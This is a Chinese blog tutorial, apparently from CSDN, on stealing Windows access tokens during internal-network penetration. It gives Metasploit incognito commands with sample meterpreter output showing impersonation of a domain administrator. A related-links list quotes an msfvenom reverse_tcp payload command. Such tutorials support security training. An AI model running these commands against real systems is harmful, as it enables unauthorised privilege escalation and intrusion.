内网渗透令牌窃取

最新推荐文章于 2023-07-30 10:00:00 发布
VIP文章 最新推荐文章于 2023-07-30 10:00:00 发布
阅读量253 收藏 1
点赞数
分类专栏: 内网安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46258964/article/details/125339869
版权

令牌
令牌是描述进程或者线程安全上下文的一个对象。
不同的用户登录计算机后, 都会生成一个Access Token,这个Token在用户创建进程或者线程时会被使用,
不断的拷贝,这也就解释了A用户创建一个进程而该进程没有B用户的权限。一般用户双击运行一个进程都会拷贝explorer.exe的Access Toke

访问令牌分为:
授权令牌(Delegation token):交互式会话登陆(例:本地用户登陆、用户桌面等)
模拟令牌(Impersonation token):非交互式登陆(例:net use 访问共享文件)
两种 token 只有在系统重启后才会清除;授权令牌在⽤户注销后,该令牌会变为模拟令牌依旧有效。

Metasploit进行令牌窃取
此工具需要提权为system权限才能查看所有的token

#加载模块
use incognito

#列出token
list_tokens -u

#窃取token
impersonate_token 'AA\Administrator'

meterpreter > impersonate_token 'AA\Administrator'
[+] Delegation token available
[+] Successfully impersonated user AA\Administrator
meterpreter > getuid
Server username: AA\Administrator

执行完命令后,通过以下命令返回之前的token
rev2self 
##或
drop_token
最低0.47元/天 解锁文章
西湖第一剑
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
agent内网渗透代理相关
04-14
内网渗透代理
MSF内网渗透实战
hackzkaq的博客
05-17 3737
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全-小熊保安 本来还是想用cobalt strike,但是由于某些原因,暂时关闭了cobalt strike的服务器,正好用msf尝试做一次内网渗透熟悉熟悉,注:最初用蚁剑看了一下,此次目标主机没开杀软,所以以下内容不涉及免杀. 一、MSF生成木马上线目标 1. 生成木马 使用命令: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XXX.XXX.XXX.XX LPORT=4444 -f ex
内网渗透学习总结
m0_56171651的博客
11-28 910
内网渗透学习总结
内网渗透体系学习6
m0_55772907的博客
10-27 640
内网
05-令牌窃取和伪造
wangluoanquan111的博客
07-30 349
在前几篇文章中给大家介绍了如何从零开始搭建一个属于自己的内网环境以及当我们进入到一个内网环境中,该怎么样判断当前机器所属的环境是工作组还是域?我们需要收集哪些信息?该通过什么方式进行信息收集?从本篇文章开始,我将开始为大家介绍域渗透的思路及方法,本篇文章主要是介绍令牌伪造在各个工具中的应用。**令牌(token)**是系统的临时秘钥,相当于账号和密码,用来决定是否允许这次请求和判断这次请求是属于哪一个用户的。
域渗透之令牌窃取
yy
05-26 1677
用户登录计算机后会生成随机的访问令牌(秘钥),这个令牌会在用户每次的进程操作中不断拷贝,所以能够识别某进程属于某用户。即令牌相当于用户的身份证令牌在系统重启后清除程序/进程能够访问到什么系统资源,取决于进程拿着谁的令牌。所以可以通过伪造令牌的方式能伪造该令牌的所属用户。
fscan内网渗透神器
09-21
scan是一款内网综合扫描工具,它非常的方便,一键启动,之后完全自动化、并且全方位漏洞扫描。它支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web...
内网渗透技术总结大全.pdf
12-22
内网渗透技术总结大全.pdf
内网渗透攻击线路图.pdf
03-21
内网渗透攻击线路图.pdf
内网渗透思路整理与工具使用
12-08
内网渗透思路整理与工具使用内网渗透思路整理与工具使用内网渗透思路整理与工具使用内网渗透思路整理与工具使用内网渗透思路整理与工具使用
内网渗透之Token令牌窃取
qq_44029310的博客
08-05 2307
本文包括:令牌的基本概念和种类,以及在windows靶场环境下访问令牌窃取利用。
[内网渗透]—令牌窃取
Sentiment的博客
12-27 2221
令牌(Token)是指系统中的临时秘钥,相当于账户和密码,有了令牌就可以在不知道密码的情况下访问目标相关资源了,这些令牌将持续存在于系统中,除非系统重新启动。
内网渗透_令牌窃取
qq_42383069的博客
04-07 1394
内网渗透_令牌窃取 0x01. 令牌简介 令牌(Token)是指系统中的临时秘钥,相当于账户和密码,有了令牌就可以在不知道密码的情况下访问目标相关资源了,这些令牌将持续存在于系统中,除非系统重新启动 0x02. 访问令牌的分类 授权令牌(Delegation token):交互式会话登陆(例:本地用户登陆、用户桌⾯等) 模拟令牌(Impersonation token):非交互式登陆(例:net use 访问共享文件) 两种 token 只有在系统重启后才会清除;授权令牌在用户注销后,该令牌会变为模拟令
windows—令牌窃取
negnegil的博客
09-10 1237
令牌的定义 令牌是描述进程或者线程安全上下文的一个对象。不同的用户登录计算机后, 都会生成一个Access Token,这个Token在用户创建进程或者线程时会被使用,不断的拷贝,这也就解释了A用户创建一个进程而该进程没有B用户的权限。一般用户双击运行一个进程都会拷贝explorer.exe的Access Token。 Windows下的访问令牌分为: * 授权令牌(Delegation token):交互式会话登陆(例:本地用户登陆、用户桌面等) * 模拟令牌(Impersonation token):非
Windows 令牌窃取
03-11 2082
简介 Window 令牌是windows访问控制模型中的重要组成部分,主要用来对线程操作安全对象时对身份权限进行识别,获得了令牌,就可以在不提供密码或其他凭证的情况下访问网络和系统资源。这些令牌将持续存在于系统中 (除非系统重新启动)。 令牌的最大特点是随机性和不可预测性,一般的攻击者或软件都无法将令牌猜测出来。令牌一般分为以下几种: 访问令牌 (Access Token) 代表访问控制操作主体的系统对象。(本文主要讲 Windows 的 AccessToken) 密保令牌 (Security Token
域内令牌窃取伪造
prettyX的博客
09-13 1297
域内令牌窃取
内网渗透-windows令牌窃取
weixin_44912035的博客
02-10 322
令牌(token) 访问令牌(Access Token):表示访问控制操作主体的系统对象 会话令牌(Session Token):是交互会话中唯一的身份标识符。 密保令牌(Security Token):又叫做认证令牌或硬件令牌,是一种计算机身份校验的物理设备,例如U盾 msf伪造令牌 use incognito #进入incognito模块 list_tokens -u #列出令牌 Delegation Token:也就是授权令牌,它支持交互式登录(例如可以通过远程
Windows令牌窃取提权
zzlx123的博客
03-11 2338
令牌(Token) 令牌(token)是系统的临时秘钥,相当于账号和密码,用来决定是否允许这次请求和判断这次请求是属于哪一个用户的。它允许你在不提供密码或其他凭证的前提下,访问网络和系统资源,这些令牌将持续存在于系统中,除非系统重新启动。令牌最大的特点就是随机性,不可预测,黑客或软件无法猜测出令牌。 假冒令牌可以假冒一个网络中的另一个用户进行各类操作。所以当一个攻击者需要域管理员的操作权限时候,需...
令牌窃取及防范
weixin_45007073的博客
06-04 1027
令牌窃取什么是令牌伪造令牌原理令牌窃取 什么是令牌 令牌(Token)是指系统中的临时密钥,相当于账户和密码,用于决定是否允许当前请求及判断当前请求是属于哪个账户的。获得了令牌,就可以在不提供密码或其他凭证的情况下访问网络和系统资源。令牌会持续存在于系统内部,除非操作系统重新启动。 令牌最大的特点是随机性和不可预测性。一般的攻击者或软件都无法将令牌猜测出来。访问令牌(Access Token)代表访问控制操作主题的系统对象。密保令牌(Security Token)也叫作认证令牌或硬件令牌,是一种用于实现计算
python内网渗透
最新发布
10-24
Python内网渗透是指利用Python编写的工具和脚本,通过漏洞利用、端口扫描、密码爆破等方式,获取内网中的敏感信息或者控制内网主机的过程。常用的Python内网渗透工具有reGeorgSocksProxy、ABPTTS等。其中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值